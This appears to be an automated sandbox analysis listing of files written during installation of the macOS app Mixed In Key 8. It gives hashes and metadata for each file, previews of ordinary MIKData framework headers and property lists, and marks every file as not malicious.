                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_BiP9EY
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):582
                                                                                                    Entropy (8bit):4.992186098296493
                                                                                                    Encrypted:false
                                                                                                    MD5:A6A663256C08E74D1EFE36BF7E3C546D
                                                                                                    SHA1:3660C32DAF664FFFB49EC3F4B5CB4F594AC235A2
                                                                                                    SHA-256:3645840722EF1BAE4CBDBCF5B8A365BB23FBA756F0F5F77BA8486E16364496ED
                                                                                                    SHA-512:BFF6174F608B28443453F42C90204B1942E71FDC27FEE5FB19D434A292D0E43C6D14E9389481AF2C1FE3E9F145A662C17A28DF25C808FBD988E522DB6DB5E589
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataSmartCollection.h.// MIKData.//.// Created by Chris Flesner on 12/3/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import "MIKDataSongCollection.h"...@class MIKDataCollection;.@interface MIKDataSmartCollection : NSObject <MIKDataSongCollection>.@property (nonatomic, copy) NSPredicate *predicate;.@property (nonatomic, strong) MIKDataCollection *libraryCollection;.@end..#pragma mark -..@interface MIKDataRecentsCollection : MIKDataSmartCollection.@property (nonatomic, assign) NSTimeInterval interval;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_PRo9zc
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C program text
                                                                                                    Size (bytes):486
                                                                                                    Entropy (8bit):4.880926064310765
                                                                                                    Encrypted:false
                                                                                                    MD5:E805BD672D7FDD919BB5202765FC8D87
                                                                                                    SHA1:EB4FB617E845CDE2773DE41D211C815FA12772EF
                                                                                                    SHA-256:C976A9DED6FDC714EEBA98C6F0828EE9DC9C9EAB4C51A65821ECE69562B48DDF
                                                                                                    SHA-512:953E13BFB74044A3E820CB5B219406B07294BB79C4008E9CE3FE1BCE5E48C38FB8B14DE264F67D59D5D6C17765EFE578A9CFF302DB266F5ECABB755815F842FF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: /*. * MIKData.h. * MIKData. *. * Created by patrickm on 07-06-11.. * Copyright 2011 Mixed In Key LLC. All rights reserved.. *. */..#import <MIKData/MIKDatabase.h>.#import <MIKData/MIKDataCollection.h>.#import <MIKData/MIKDataSong.h>.#import <MIKData/MIKDataSongKeySegment.h>.#import <MIKData/MIKDataSongEnergySegment.h>.#import <MIKData/MIKDataCuePoint.h>.#import <MIKData/MIKDataSongWaveform.h>..#import <MIKData/MIKDataSongCollection.h>.#import <MIKData/MIKDataSmartCollection.h>.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_WUS3qQ
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):462
                                                                                                    Entropy (8bit):4.996401421440394
                                                                                                    Encrypted:false
                                                                                                    MD5:E4113C543DC1417D150F871D635205F2
                                                                                                    SHA1:7CEF5C7C8F6305AB8CCFE4CB6EC7E4BAD48EDF11
                                                                                                    SHA-256:9F3381185B6A14F64B68975CA43E1E0D102C2CCF120330FB9BCD9561119B5694
                                                                                                    SHA-512:CB6FDA38CDFEECC445BAE3A46541735BC931C8FB5E0B97B4A0823A4C909E47220F7ABFE9E88AC137EA5CA47D6405CEF8D84DDA8F4A301AF25977F7B881192AAC
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataSongCollection.h.// MIKData.//.// Created by Chris Flesner on 12/3/14..// Copyright (c) 2014 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>...@protocol MIKDataSongCollection <NSObject>.@property (nonatomic, copy) NSString *name;.@property (nonatomic) SInt16 index;.@property (nonatomic, retain) NSSet *songs;.@property (nonatomic, copy) NSString *filter;.@property (nonatomic, readonly) BOOL isUserCollection;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_ZKR85b
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):4809
                                                                                                    Entropy (8bit):5.0874480886644555
                                                                                                    Encrypted:false
                                                                                                    MD5:3944A1F10FF239DA0B003A9B0323D56C
                                                                                                    SHA1:50B7BFAD9128C7B669CD05A72946F1A21859333D
                                                                                                    SHA-256:E56E5B68DA3A884D791C133B01C162E9979EFE148C407DC3451B1166DF63B6C6
                                                                                                    SHA-512:3790E7ABDF4C58BC1D43B55F444D7388ABFB08B987585C3ACFF581DCC4BB0C8BD7EB734CB5CF86612455EB6F7881E442193E2FE4871BD61B343945D8EBF73ECE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataSong.h.// MIKData.//.// Created by patrickm on 23-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>..NS_ASSUME_NONNULL_BEGIN..//.patsteboard type.extern NSString * const MIKDataSongPasteboardType;...@class NDAlias;.@class MIKDataCollection;.@class MIKDataSongEnergySegment;.@class MIKDataSongKeySegment;.@class MIKDataSongWaveform;.@class MIKBeats;.@class MIKDataCuePoint;..#define kMIKMinimumDataSongSegmentDuration 5.0..// MIKDataSongErrorCode error codes.typedef NS_ENUM(unsigned int, MIKDataSongErrorCode) {..MIKDataSongErrorSuccess = 0,.....// no error..MIKDataSongErrorFileNotFound,.....// file not found..MIKDataSongErrorFileTooLong,.....// file exceeds duration limit..MIKDataSongErrorAnalysisFailed.....// song cannot be analyzed (other error).};..@interface MIKDataSong : NSManagedObject..@property (nonatomic, class) BOOL resolvesBookmarksUsingSecurityScope; // Default is NO.@property (nonatomic, readonly, class) NSString
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_cKXVIi
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):969
                                                                                                    Entropy (8bit):4.946422719397011
                                                                                                    Encrypted:false
                                                                                                    MD5:E91F05811541150D171E229C645B0D50
                                                                                                    SHA1:8B903B0C1177133462C1FAA51462C3C6B1E0D2BE
                                                                                                    SHA-256:5ED1387CC8D73B323A7452F68BAA141A63994A4F57E2FFC2A0B570B113EFEB6D
                                                                                                    SHA-512:E66070A07602A3A02B77015664DD99795A9B6D0CBD6F38BAC137B77FEA3CB4EC8AFAC622801E34690567D4E8691D0A06169D91583C70C9D48EF98E06CC424924
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataSongKeySegment.h.// MIKData.//.// Created by patrickm on 27-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>..@class MIKDataSong;.@interface MIKDataSongKeySegment : NSManagedObject.@property (nonatomic, readonly, class) NSString *entityName;.@property (nonatomic, retain) MIKDataSong *song;..@property (nonatomic) double startTime;.@property (nonatomic) double length;.@property (nonatomic) double endTime;..@property (nonatomic, copy) NSString *key;.@property (nonatomic) float energy;.@property (nonatomic) float volume;.@property (nonatomic) float confidence;.@property (nonatomic) BOOL singleNote;..// -isEqual: must not be overridden by subclasses of NSManagedObject,.// so we use -isEquivalent: instead. This method is used by the database.// merge feature to test whether a song segment in one database is.// equivalent to a song segment in another database.- (BOOL)isEquivalent:(id)object;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_elhPLV
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:UTF-8 Unicode C++ program text
                                                                                                    Size (bytes):606
                                                                                                    Entropy (8bit):5.155919107391079
                                                                                                    Encrypted:false
                                                                                                    MD5:AA698164F6FBAD325DB1828B2B0F6F55
                                                                                                    SHA1:B2890E63199374FB507402650F0940163127C6E6
                                                                                                    SHA-256:E8DD4A081367FFF2958004D55115898C858D2D108260D6254DD9A6C48D0CA767
                                                                                                    SHA-512:E1BE9A9A29140966CE6DE25D7B878BAF19D941B403A5F516D8B6C2E17386F480F10B7295A4D56F45BFCEF089067C3E124405DB5A9ECF187767A17E4D41C5E027
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataCuePoint.h.// MIKData.//.// Created by Chris Flesner on 6/29/16..// Copyright .. 2016 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>...NS_ASSUME_NONNULL_BEGIN..@class MIKDataSong;.@interface MIKDataCuePoint : NSManagedObject.@property (nonatomic, readonly, class) NSString *entityName;.@property (nonnull, readonly) NSString *shortName;..@property (nonatomic) double time;.@property (nonatomic) SInt16 energyLevel;.@property (nonatomic, copy, null_resettable) NSString *name;.@property (nonatomic, strong, nullable) MIKDataSong *song;.@end..NS_ASSUME_NONNULL_END.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_qVu2hA
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):6240
                                                                                                    Entropy (8bit):5.122025609401223
                                                                                                    Encrypted:false
                                                                                                    MD5:1770F7E86345CC6D445215041510ED14
                                                                                                    SHA1:E14C2EBEF4BD0E7203CD567A1F49FEB758C2F805
                                                                                                    SHA-256:095A3D2E7E9927E48B01F9FB1546483BEE442737883DFA0D40E1AE3525DAD82B
                                                                                                    SHA-512:46F525CDAE51727F8AC32440B56754F83016FB72CC71BDAFBC3519EBD2115194E856714B4E3FEA67960DE7F97DCD1EF0C260C5F633FDDB0088F11740A9C67714
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDatabase.h.// MIKData.//.// Created by patrickm on 24-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <Cocoa/Cocoa.h>..//.name of the database data file.extern NSString * const MIK_5_DB_NAME;.extern NSString * const MIK_6_DB_NAME;.extern NSString * const MIK_DB_NAME;.extern NSString * const MASHUP_1_DB_NAME;.extern NSString * const MASHUP_DB_NAME;..//.notifications.extern NSString * const MIKDatabaseMigrationWillBeginNotification;.extern NSString * const MIKDatabaseMigrationDidProgressNotification;.extern NSString * const MIKDatabaseMigrationDidFinishNotification;.extern NSString * const MIKDatabaseMigrationProgressKey;..extern NSString * const MIKDatabaseSyncWillBeginNotification;.extern NSString * const MIKDatabaseSyncMadeProgressNotification;.extern NSString * const MIKDatabaseSyncDidFinishNotification;.extern NSString * const MIKDatabaseSyncProgressKey;.extern NSString * const MIKDatabaseSyncObjectIDsForChangedSongsKey;.extern NSString * con
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_wzB8vb
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):478
                                                                                                    Entropy (8bit):5.080673442555204
                                                                                                    Encrypted:false
                                                                                                    MD5:F65E998BB7C9D18A7A90BD98DA7AF340
                                                                                                    SHA1:5F7B0BBD108099E3A4FD4EC8B12ED5F0CBD4497D
                                                                                                    SHA-256:0E5437707D30A959B08DEBE003095183D064D0CF6507ECB8CD4B9BCB5DFBB4FA
                                                                                                    SHA-512:81FE2B2BBAE9711BE80375E1F543EA04121B03A22AEACA127BC231981E64E87112B4E1E0963039D2AC30393888F2E271C35CDA394BB7959593935E2AE20B224D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataSongWaveform.h.// MIKData.//.// Created by Andrew Madsen on 8/12/13..// Copyright (c) 2013 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreData/CoreData.h>...@class MIKDataSong;.@class MIKNewWaveform;.@interface MIKDataSongWaveform : NSManagedObject.@property (nonatomic, readonly, class) NSString *entityName;.@property (nonatomic, retain) MIKNewWaveform *object;.@property (nonatomic, retain) MIKDataSong *song;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_xPNoEw
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):577
                                                                                                    Entropy (8bit):5.120270180279075
                                                                                                    Encrypted:false
                                                                                                    MD5:2950B813F708E1206D8FE7E730A7A799
                                                                                                    SHA1:2BD490DD902B5D5A8803EEC7CDA3848F96B4A81F
                                                                                                    SHA-256:197E7E134F47721D01F32F7D910E31335F9DDB9A223DC6E412031C25C8638D78
                                                                                                    SHA-512:A0F0150A0DC071EDA209C3E0CFE9375D7DC8E77B4882729F54B725FFFF7990FCB930F12946DE349FBFD730C1536F6885D13F9B8ACF3D4BD9E343E40033F0778A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataCollection.h.// MIKData.//.// Created by patrickm on 23-04-11..// Copyright 2011 Mixed In Key LLC. All rights reserved..//..#import <CoreData/CoreData.h>.#import "MIKDataSongCollection.h"...FOUNDATION_EXPORT NSString * const MIKDataCollectionDidUpdateSongsNotification;..@interface MIKDataCollection : NSManagedObject <MIKDataSongCollection>.@property (nonatomic, readonly, class) NSString *entityName;.@property (nonatomic) BOOL isLibrary;..@property (nonatomic, readonly) BOOL isLibraryCollection;.@property (nonatomic, readonly) BOOL isUserCollection;.@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Headers/.BC.T_zwYT7R
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII C++ program text
                                                                                                    Size (bytes):613
                                                                                                    Entropy (8bit):4.961761871939289
                                                                                                    Encrypted:false
                                                                                                    MD5:0C3CAE75B38EE06AD3AAA3096CD2DB79
                                                                                                    SHA1:4E194A63CC4CB2C3575E7811808D1D164D4BF327
                                                                                                    SHA-256:FF30609FDC698E8EA21606842661380AF2AF051F987DD0AEDFC53C9E60DDAD96
                                                                                                    SHA-512:13CC047E7EBD35416724F6B86F8B246298C99D595D6B05A38B21091B9E63229F19BA4A90B8EAD9FB22747458A4C5C4B0D1D875667354AB0CB74EB3E609CE745D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: //.// MIKDataSongEnergySegment.h.// MIKData.//.// Created by Andrew Madsen on 4/19/13..// Copyright (c) 2013 Mixed In Key LLC. All rights reserved..//..#import <Foundation/Foundation.h>.#import <CoreData/CoreData.h>...@class MIKDataSong;.@interface MIKDataSongEnergySegment : NSManagedObject.@property (nonatomic, readonly, class) NSString *entityName;.@property (nonatomic, retain) MIKDataSong *song;..@property (nonatomic) float energy;.@property (nonatomic) double startTime;.@property (nonatomic) double length;.@property (nonatomic) double endTime;.@property (nonatomic, retain) NSString *comment;..@end.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Modules/.BC.T_0x5Xyp
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:ASCII text
                                                                                                    Size (bytes):95
                                                                                                    Entropy (8bit):4.316885021538947
                                                                                                    Encrypted:false
                                                                                                    MD5:2EB1A975C891345D7E01CC61C513511A
                                                                                                    SHA1:2211ADB4FBB25226D44EE07209734B465C59B116
                                                                                                    SHA-256:F64609D8081FA104F310690C295A4116334B314047BE0361F3F382C510A098CB
                                                                                                    SHA-512:920BD805F90D75E0B9C3ED7F0150EB4D53A8DF832BF4538C6889C04564513C46283912B1A2483F40387DC62F7381A2B286D1101F028276564745E5A060B64F4F
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: framework module MIKData {. umbrella header "MIKData.h".. export *. module * { export * }.}.
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_8mWvHg
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:XML document text
                                                                                                    Size (bytes):1175
                                                                                                    Entropy (8bit):5.190029047075801
                                                                                                    Encrypted:false
                                                                                                    MD5:D7F7A88BCC73179383AA7481B0C9C25B
                                                                                                    SHA1:61366A2A4FF4002EE62311EB8F39619049AD7B6B
                                                                                                    SHA-256:D0E345EF77F540F2A1676E281254D9334C42BB38D8E73D635466F6E9821F2551
                                                                                                    SHA-512:89CDABD26B9E8A9BB203C3B8494483B9090EF1A64465725A4D4A6738D4937BD368C5E04E0A184FC205C56AB0B7B63E85B037FB4D22F14D3E556F5AA2FB2E7F01
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: <?xml version="1.0" encoding="UTF-8"?>.<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">.<plist version="1.0">.<dict>..<key>BuildMachineOSBuild</key>..<string>18G95</string>..<key>CFBundleDevelopmentRegion</key>..<string>English</string>..<key>CFBundleExecutable</key>..<string>MIKData</string>..<key>CFBundleIdentifier</key>..<string>com.mixedinkey.MIKData</string>..<key>CFBundleInfoDictionaryVersion</key>..<string>6.0</string>..<key>CFBundlePackageType</key>..<string>FMWK</string>..<key>CFBundleShortVersionString</key>..<string>1.0</string>..<key>CFBundleSignature</key>..<string>????</string>..<key>CFBundleSupportedPlatforms</key>..<array>...<string>MacOSX</string>..</array>..<key>CFBundleVersion</key>..<string>1</string>..<key>DTCompiler</key>..<string>com.apple.compilers.llvm.clang.1_0</string>..<key>DTPlatformBuild</key>..<string>9F2000</string>..<key>DTPlatformVersion</key>..<string>GM</string>..<key>DTSDKBuild</key>..<string>17E
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_MsPb1t
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):9178
                                                                                                    Entropy (8bit):6.516021372092584
                                                                                                    Encrypted:false
                                                                                                    MD5:7D94D086AD0E51C43245607155271F69
                                                                                                    SHA1:0DFE3290199A3A096909F8B7DC5AAD3B61FB5148
                                                                                                    SHA-256:D2701C583538FFA76FD6FBEE97118539BFDB1167DDAA5A1E3A2C5AAE618A6917
                                                                                                    SHA-512:39EF257047B9EDF033655B0BB87E2D2808C949DB49069A72A78E1999E14B6456FB39BD5AE9B1CE1DFCFCF7A7BDB2AF9A00BB971A2EE8C752E639943667A9C5B6
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top..................../.0.1.2.<.E.F.K.L.T.Y.^.a.d.e.h.k.p.q.t.x.}.~.......................................................................................".(.)...1.5.8.<.B.C.H.I.L.Q.T.U.Z.].a.d.h.u.v.w.x.}.......................................................................................!.%.(.../.4.7.;.>.D.I.L.P.S.Y.Z._.b.f.i.o.p.u.x.|.......................................................................................!.".#.$.%.*./.0.3.8.;.>.C.F.J.M.N.T.Z.[.`.c.g.j.p.q.v.y.}........................................U$null............._..NSEntityMappingsByNameV$class_..NSEntityMappings................ZNS.objects..........[.......................... .!.".".$.%.&.'.(.).*.+.&.-_..NSDestinationEntityName_..NSSourceEntityName]NSMappingName_..NSDestinationEntityVersionHashZNSUserInfo_..NSSourceEntityVersionHash_..NSSourceExpression_..NSRelationshipMappings]NSMappingType_. NSEntityMigrationPolicyClassName_..NSAttributeMappings........
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_QRmbJW
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):10315
                                                                                                    Entropy (8bit):6.592642192702952
                                                                                                    Encrypted:false
                                                                                                    MD5:5407C54C4C3DFA524594E18762944E73
                                                                                                    SHA1:54412F8EA70EA72CC95480F44E9CE941E02032C3
                                                                                                    SHA-256:203C3D6936F8C9C747A73871B720D980F31F79DD094F63B4B5E2DCC032274878
                                                                                                    SHA-512:66CB19FFB8F7B049EB4B675336C5CEE1D9DD8019FFE13AB3E10A755D2D9379A0841D9753A0E4CBDE180C9BFC7F0CE6196F187F967852E87D87B0D808CA2D9799
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00..............W.XX$versionX$objectsY$archiverT$top..................0.1.2.9.B.C.J.P.Q.W.X.^._.b.f.l.m.q.~...........................................................................................".(.-.0.4.7.=.>.C.F.J.M.N.T.Y.\.`.c.i.j.o.r.v.y.}.................................................................................".&.).*.0.1.6.9.=.@.F.G.M.N.T.U.Z.].a.d.e.k.p.s.w.z.......................................................................................$.'.+...5.;.<.A.B.E.J.M.N.S.V.Z.].c.d.j.k.p.q.t.y.|.}......................................................................................... .%.&.)...1.6.9.=.@.O.SU$null............._..NSEntityMappingsByNameV$class_..NSEntityMappings.................ZNS.objects................g.o.................... ...!.".#.$.%.$.'.%.%.%.+.,.-.%./_..NSDestinationEntityName_..NSSourceEntityName]NSMappingName_..NSDestinationEntityVersionHashZNSUserInfo_..NSSourceEntityVersionHash_..NSSourceExpression_..NSRelationshipMappings]NSMappingType
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/.BC.T_s0UYuh
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):13775
                                                                                                    Entropy (8bit):6.608720054256828
                                                                                                    Encrypted:false
                                                                                                    MD5:66A341895464CBDDA305108065CBE058
                                                                                                    SHA1:D2E54ADF0B0158CA6B621712AD233E7774B75315
                                                                                                    SHA-256:07D91E4FDA2C6CFAB5FAE9BD0FF6D2ECFA4DA1F09BE24D845A2F65530F7BDFA8
                                                                                                    SHA-512:F590BD3495EF349A118F9BB205A817761D6EA7600C9417C7F5BAF219AFBE9BB82FEE32E185FBC784CE401E31E6C68A0934ADC0E7E86000921ECED8B925ABCA7A
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top..................0.1.2.3.4.>.G.H.M.N.V.[.`.c.f.g.j.m.r.s.v.z...............................................................................................$.%.*.-.1.4.:.;.@.C.G.J.P.Q.V.Y.].`.d.j.k.p.q.t.y.|...........................................................................................!.$.(...3.4.7.<.?.D.G.K.N.Z.[.\.].b.g.h.k.p.s.v.{.~................................................................................... .%.(.,./.5.:.=.A.D.J.K.Q.R.W.Z.^.a.g.h.m.p.t.w.x.~....................................................................................... .#.'.*.0.1.6.7.:.?.B.C.H.K.O.R.S.Y.Z._.`.c.h.k.l.q.t.x.{.|.........................................................................................!.%.(...3.6.:.=.C.D.I.L.P.S.T.Z._.b.f.i.o.t.w.{.~..........................U$null............._..NSEntityMappingsByNameV$class_..NSEntityMappings.................ZNS.objects..............6.f....A.................. ...!.".#.$
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_C4nvqY
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):8716
                                                                                                    Entropy (8bit):6.489296179743198
                                                                                                    Encrypted:false
                                                                                                    MD5:6AD982F419EC9A33952985A786F9E25A
                                                                                                    SHA1:2ED246672CFFEC956A7CC8C40FB53192E62A3898
                                                                                                    SHA-256:8A6613D74DF636148C776EEA0EBB6C5E7A24D87193B138EECE5153E663D8CBB2
                                                                                                    SHA-512:B30B4AFDE1B73FA37F105B4D0E566C39466D9DCA9650828F951082D922D6C231150B21FED2B09E796482E1B9F0148D654F4266C3057D505C0F5D0A2DFD6532B0
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview: bplist00.................X$versionX$objectsY$archiverT$top...............!.".#.$.%.&.>.?.C.J.|.}.~...............................................................................).3.4.=.G...R.[.d.m.n.w..................................................... .(.).-./.4.=.A.I.M.Q.W.[.`.c.f.j.k.o.........................................................#.$.%.&...8.@.A.J.N.T.X.].`.a.e.m.n.z.~....U$null.................ZNSEntities_..NSFetchRequestTemplates_..NSVersionIdentifiersV$class.................... WNS.keysZNS.objects...................................J.5.E.%..TSongZKeySegment]EnergySegmentZCollectionXWaveform..'.(.).*...+.,.-.../.0.1.2.3.4.5.6...8.9...;....\NSPropertiesZNSUserInfo_..NSManagedObjectModel_..NSClassNameForEntity_..NSVersionHashModifier_..NSFetchIndexDescriptions_..NSCompoundIndexes\NSEntityName]NSSubentities]NSSuperentity_..NSRenamingIdentifier..._.....l...a.k........[MIKDataSong........@.A. ......D.E.F.GZ$classnameX$classes_..NSMutableDictionary..F.H.I\NSDictionaryXNSObjec
                                                                                                    /private/var/folders/zz/zyxvpxvq6csfxvn_n0000000000000/C/PKInstallSandboxManager/788FD18B-B2B0-42F9-A43A-B0FBCE7E2A46.activeSandbox/Root/Applications/Mixed In Key 8.app/Contents/Frameworks/MIKData.framework/Versions/A/Resources/DataModel.momd/.BC.T_DSgaCj
                                                                                                    Process:/System/Library/PrivateFrameworks/PackageKit.framework/Resources/installd
                                                                                                    File Type:Apple binary property list
                                                                                                    Size (bytes):11128
                                                                                                    Entropy (8bit):6.506953843893974
                                                                                                    Encrypted:false
                                                                                                    MD5:BCFE6192B543A7706D1854EC580858AB
                                                                                                    SHA1:F8A9637F96BB208F7474713B3C2A5CA16FBAB317
                                                                                                    SHA-256:FC9A4CF551F5507A40B00E67F88C741A9DDA932B4CCEDD49C2CCC5EEFC5A684B
                                                                                                    SHA-512:D934A929AC2182FC32722AD164E79D7C8CD2C8073B675D6C549AE3E662C09E815DE6DC0EA6AE20F218A500812384E77785EDD44A8956AF8B29AC37904DBE7A08
                                                                                                    Malicious:false
                                                                                                    Reputation:low
